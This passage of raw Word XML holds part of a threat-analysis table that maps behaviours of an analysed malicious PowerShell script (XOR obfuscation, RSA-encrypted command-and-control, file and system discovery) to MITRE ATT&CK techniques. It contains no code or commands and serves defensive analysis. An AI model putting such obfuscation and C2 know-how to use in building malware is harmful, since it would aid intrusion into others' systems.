          </w:tcPr>
          <w:p w14:paraId="6D02368B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00363B7A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] … </w:t>
            </w:r>
            <w:r w:rsidRPr="00260243">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>and execute the decoded PowerShell Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="51E999B4" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7999076A" w14:textId="2F17F828" w:rsidR="00345E09" w:rsidRDefault="00ED5D68" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EBE762C" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09"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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC8822C" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00FF3672" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0636CC7F" w14:textId="38340621" w:rsidR="00345E09" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F4FD702" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34F874BE" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AA3712B" w14:textId="2C260EA0" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3957CA" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004825E9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00535883">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The PowerShell script employs several layers of obfuscation to hide its actual functionality</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="004825E9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The biggest section of the PowerShell script is XOR encoded using a single byte key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w14:paraId="145826FE" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17876919" w14:textId="2B62ACD2" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00ED5D68" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D7A93E" w14:textId="1A03A035" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C847C1A" w14:textId="4047FAEB" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel: Asymmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7199BD58" w14:textId="151AED93" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00666C43" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3201D93F" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF81E88" w14:textId="2471DE6B" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B7F650" w14:textId="1BDDE8D2" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00527497" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="547129A9" w14:textId="30FF3B52" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00EF6B51">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="13DEE174" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7963B104" w14:textId="4976B48F" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5D68">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008AD07B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="686CB30E" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1E1F04" w14:textId="2F53261A" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7798B637" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38934D0C" w14:textId="23E974C9" w:rsidR="00345E09" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05FFA2F3" w14:textId="2B397052" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1AF2BC" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="09A7A7F5" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="687BD9BB" w14:textId="366EA904" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5D68">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="725CDCC8" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F8EDC8A" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56AF8BF3" w14:textId="70091DF1" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2798BFD2" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A03AD43" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A1AB23D" w14:textId="1393351B" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D34B244" w14:textId="1D7CB55E" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery examples</w:t>
            </w:r>
            <w:r w:rsidR="00153786">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> from known behaviours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00ED5880" w14:paraId="7058DE1A" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE31FE4" w14:textId="74DCC51B" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5D68">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="474B6F61" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FCB854" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
